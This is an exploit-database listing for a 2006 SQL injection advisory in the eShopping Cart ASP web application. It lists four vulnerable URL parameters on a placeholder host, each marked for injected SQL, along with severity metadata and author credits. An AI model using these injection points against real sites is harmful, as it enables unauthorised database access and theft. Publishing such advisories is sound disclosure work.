eShopping Cart [injection sql]
CVE
Category
Price
Severity
N/A
CWE-89
$1000
High
Author
Risk
Exploitation Type
Date
Unknown
High
Remote
2006-12-01
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006110108 vendor site:http://www.enthrallweb.com/
product:eShopping Cart
bug:injection sql
risk:medium
injection sql :
http://site.com/reviews.asp?ProductID='[sql]
http://site.com/subProducts.asp?cat_id='[sql]
http://site.com/productdetail.asp?ProductID='[sql]
http://site.com/subProducts.asp?cat_id=27&sub_id='[sql]
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit (at) gmail (dot) com [email concealed]
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only.Terms of Use and Privacy Policy and Impressum